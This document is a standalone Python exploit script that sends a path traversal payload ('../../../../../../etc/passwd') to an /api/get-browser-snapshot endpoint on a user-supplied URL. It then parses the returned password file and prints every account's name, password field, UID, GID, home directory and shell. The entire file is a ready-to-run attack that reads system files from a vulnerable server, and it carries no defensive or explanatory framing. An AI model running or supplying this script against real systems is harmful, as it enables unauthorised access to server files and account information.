#!/usr/bin/env python3.11
import requests
import re

def exploit(url):
    if not url.startswith("http"):
        target = "http://" + url + "/api/get-browser-snapshot"
    else:
        target = url + "/api/get-browser-snapshot"

    payload = {"snapshot_path": "../../../../../../etc/passwd"}
    
    try:
        response = requests.get(target, params=payload)
        response.raise_for_status()
        
    except requests.RequestException as e:
        print("Request failed...")
        print(str(e))

    passwd_pattern = re.compile(r"^([a-zA-Z0-9._-]+):([^:]*):(\d+):(\d+):([^:]*):([^:]*):([^:]*)$")
    contents = passwd_pattern.findall(response.text)
    for match in contents:
        user, password, uid, gid, comment, home, shell = match
        print("User: " + user)
        print("Password: " + password)
        print("UID: " + uid)
        print("GID: " + gid)
        print("Comment: " + comment)
        print("Home Directory: " + home)
        print("Shell: " + shell)
        print("----")

if __name__ == "__main__":
    url = input("Enter vulnerable url: ")
    exploit(url)